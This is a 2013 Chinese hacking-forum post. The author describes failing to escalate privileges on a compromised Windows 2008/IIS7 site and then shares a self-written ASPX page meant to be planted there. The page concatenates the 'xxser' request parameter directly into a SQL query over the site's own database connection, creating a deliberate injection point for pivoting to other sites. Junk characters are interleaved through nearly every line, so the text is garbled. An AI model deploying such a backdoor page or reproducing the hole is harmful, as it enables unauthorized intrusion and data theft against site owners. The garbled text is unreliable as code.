昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
3 Q S S% @: m+ H {1 ?0 R其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。( q1 U1 K" y# R o |% [0 l
代码量不多,自己写个拉倒了。烦死了。+ U; {$ J+ x+ p2 J, l. y
) ?- [/ i6 {1 g0 k
6 P) J$ W: V( j; T; F<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">7 e: Q/ H( [1 g8 m2 a0 g3 U
<html xmlns="http://www.w3.org/1999/xhtml">
+ T9 X! H4 ]$ J1 C L1 o7 `* @<head runat="server">
- q/ `! P9 v' p3 _$ @ <title>暗影aspx构造注射专用页面</title>
5 u) w/ a- ?( }: U& O</head>8 M- B; H v1 q) f% w% A0 A- w
<body>+ x0 d/ o( Q6 ^2 |3 T1 m6 [
<form id="form1" runat="server"># n$ L# O$ ^* [! i
<div>
* J4 J( l. t: f% |' W- Q <script language="c#" runat="server">2 U! w$ H t; h* f
. Z; |* K5 ~$ A+ C4 ? void page_init(object sender, EventArgs e)/ J) B! d& d, V% U' W z
{ Y3 c. X+ X9 x5 t# z9 [ o, j
2 u8 H6 Q9 w# _ System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
6 I, e ? t3 ^: R4 k u / `+ w( J+ A# `6 t" M% w
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();' h% D- J! l) U9 N$ n/ F$ A2 ` d
conn.Open();
7 ?: o) q& s' {1 q6 s9 d 1 W4 N1 {' Z0 T) B& i3 z1 d
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1/ r. Y% W- h4 ?. W* l/ c& K
e( _, o5 I* s
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
( _6 {/ U% t- _2 m4 B" r8 f int x = command.ExecuteNonQuery();
$ Z0 }- J" }' g8 ] Response.Write(i+"\n");
+ L+ R' W+ v9 v8 ~8 y Response.Write(x); ?* o( M: @8 C& J; z* X
conn.Close();
# \. u) C0 t5 d Z; ^ }$ T' K0 ]1 w, B4 W
6 _+ D+ ~, r8 L+ u. o
</script>% U, N7 S8 N% y) E$ u
</div>/ U0 Y) }1 b* g8 V& I$ L$ {
</form>
9 g7 t$ w2 F5 Y* b! [</body>9 C5 O: O2 w' W' R/ j" g& c
</html>
, }+ f i- u* B" w |
发表于 2013-3-20 21:32:01
收藏
支持
反对